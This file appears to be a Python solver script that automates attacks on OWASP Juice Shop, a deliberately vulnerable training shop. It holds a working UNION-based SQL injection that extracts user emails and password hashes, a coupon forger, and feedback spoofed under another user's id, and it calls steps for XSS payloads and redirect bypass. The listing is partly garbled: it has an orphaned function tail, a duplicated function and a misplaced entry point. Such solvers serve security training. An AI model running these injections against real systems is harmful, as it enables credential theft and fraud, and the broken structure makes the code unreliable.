def solve_feedback_challenges(server):
    """Run the feedback-challenge solutions in order, framed by console banners.

    One admin session is obtained up front and handed to every step except
    ``submit_feedback_as_another_user``, which opens its own session.

    :param server: juice shop URL
    """
    print('\n== FEEDBACK CHALLENGES ==\n')
    admin = get_admin_session(server)
    shared_session_steps = (
        submit_zero_star_feedback,
        submit_xss4_feedback,
        inform_shop_of_problem_libraries,
    )
    for step in shared_session_steps:
        step(server, admin)
    submit_feedback_as_another_user(server)
    delete_all_feedback(server, admin)
    print('\n== FEEDBACK CHALLENGES COMPLETE ==\n')
def solve_product_challenges(server):
    """Run the product-challenge solutions in order, framed by console banners.

    A single admin session is shared by the first five steps; ``forge_coupon``
    takes only the server URL and obtains a session of its own.

    :param server: juice shop URL
    """
    print('\n== PRODUCT CHALLENGES ==\n')
    admin = get_admin_session(server)
    shared_session_steps = (
        access_another_user_basket,
        order_christmas_special,
        make_ourselves_rich,
        update_osaft_description,
        update_product_with_xss3_payload,
    )
    for step in shared_session_steps:
        step(server, admin)
    forge_coupon(server)
    print('\n== PRODUCT CHALLENGES COMPLETE ==\n')
def solve_misc_challenges(server):
    """Run the miscellaneous challenge solutions in order, framed by banners.

    Every step receives the same admin session created at the start.

    :param server: juice shop URL
    """
    print('\n== MISC CHALLENGES ==\n')
    admin = get_admin_session(server)
    steps = (
        access_score_board,
        access_administration,
        bypass_redirect_whitelist,
        check_all_language_files,
        provoke_error,
        decrypt_easter_egg,
        solve_challenge_99,
    )
    for step in steps:
        step(server, admin)
    print('\n== MISC CHALLENGES COMPLETE ==\n')
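def forge_coupon(server):
    """Apply a locally reconstructed 99%-off coupon to the basket and check out.

    The coupon comes from ``_generate_coupon``, which derives it from the
    current month and year alone. Nothing secret enters that code, so any
    client can reproduce it; on the server side the remediation is to issue
    unpredictable codes and validate them against stored state rather than
    a recomputable encoding.

    :param server: juice shop URL
    :raises RuntimeError: if the basket's coupon endpoint does not accept the code
    """
    session = get_admin_session(server)
    # The script addresses the basket by the current user's id.
    basketid = get_current_user_id(server, session)
    # Argument order presumably (product id, basket id, quantity) — confirm
    # against _build_basket_payload.
    payload = _build_basket_payload(2, basketid, 1)
    _add_to_basket(server, session, payload)
    couponcode = _generate_coupon()
    # Plain call: the original carried a trailing comma, which turned this
    # statement into a throwaway one-element tuple (a Python 2 print leftover).
    print('Applying forged coupon...')
    coupon_url = '{}/{}/coupon/{}'.format(
        _get_basket_url(server), basketid, couponcode)
    applycoupon = session.put(coupon_url)
    if not applycoupon.ok:
        raise RuntimeError('Error applying coupon code.')
    _checkout(server, session, basketid)
    print('Success.')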
def get_users_with_sql_injection(server):
    """Print user e-mails and password hashes obtained through the product search.

    A UNION can only be spliced into the search this way because the search
    term reaches the SQL query unparameterised — the server-side defect this
    challenge illustrates; the fix is a parameterised query. As a side effect
    this also solves the "log in as admin with real credentials" challenge if
    it was still open.

    :param server: juice shop URL
    :raises RuntimeError: when the search request does not come back ``ok``
    """
    session = get_admin_session(server)
    injection = "test')) UNION SELECT NULL,email,password,NULL,NULL,NULL,NULL,NULL FROM USERS--"
    search_url = '{}/rest/product/search?q={}'.format(server, injection)
    users = session.get(search_url)
    if not users.ok:
        raise RuntimeError('Error with SQLi attempt.')
    print('Found email and password hashes with SQLi, printing...')
    # The UNION places the users columns into the product fields:
    # email arrives as "name", the password hash as "description".
    for row in users.json().get('data'):
        email, pw_hash = row.get('name'), row.get('description')
        print('Email: {}, Password hash: {}'.format(email, pw_hash))
    print('Done.')
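def submit_feedback_as_another_user(server):
    """Post feedback from the admin session while attributing it to UserId 2.

    The request body carries a client-chosen ``UserId``; the challenge counts
    as solved when the server stores the feedback under that id rather than
    the session's own user, which points to a missing server-side ownership
    check on the field.

    :param server: juice shop URL
    """
    # Plain call: the original carried a trailing comma, which turned this
    # statement into a throwaway one-element tuple (a Python 2 print leftover).
    print('Submitting feedback from admin account as userid 2...')
    session = get_admin_session(server)
    payload = {'comment': 'nyah nyah', 'UserId': 2}
    send_feedback(server, session, payload)
    print('Success.')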
# NOTE(review): the next statement is the tail of a function (presumably
# _checkout) whose head lies outside this excerpt; it is reproduced unchanged.
if not checkout.ok:
    raise RuntimeError('Error checking out basket.')


def _generate_coupon():
    """Reconstruct the shop's coupon code for the current month and year.

    The code is the z85 encoding of ``MMMYY-99`` — upper-case three-letter
    month, two-digit year, then the discount — built from ``datetime.now()``
    alone. Because nothing secret enters the encoding, any client can
    reproduce a valid code, which is the weakness the coupon challenge
    demonstrates. Assumes ``z85`` is imported at file top — confirm.

    :return: the z85-encoded coupon for the current month
    """
    today = datetime.datetime.now()
    stamp = '{month}{year}-99'.format(
        month=today.strftime('%b').upper(),
        year=today.strftime('%y'),
    )
    return z85.encode(stamp)


# Duplicate of the solve_product_challenges defined earlier in this listing;
# reproduced here so the excerpt keeps its original content.
def solve_product_challenges(server):
    """Run the product-challenge solutions in order, framed by console banners.

    A single admin session is shared by the first five steps; ``forge_coupon``
    takes only the server URL and obtains a session of its own.

    :param server: juice shop URL
    """
    print('\n== PRODUCT CHALLENGES ==\n')
    admin = get_admin_session(server)
    shared_session_steps = (
        access_another_user_basket,
        order_christmas_special,
        make_ourselves_rich,
        update_osaft_description,
        update_product_with_xss3_payload,
    )
    for step in shared_session_steps:
        step(server, admin)
    forge_coupon(server)
    print('\n== PRODUCT CHALLENGES COMPLETE ==\n')


if __name__ == '__main__':
    # Script entry point: runs a single challenge against a local instance.
    server = 'http://localhost:3000'
    session = get_admin_session(server)
    order_christmas_special(server, session)
def solve_file_handling_challenges(server):
    """Run the file-handling challenge solutions in order, framed by banners.

    Both steps share one admin session created at the start.

    :param server: juice shop URL
    """
    print('\n== FILE HANDLING CHALLENGES ==\n')
    admin = get_admin_session(server)
    for step in (download_files_from_ftp, solve_file_upload_challenges):
        step(server, admin)
    print('\n== FILE HANDLING CHALLENGES COMPLETE ==\n')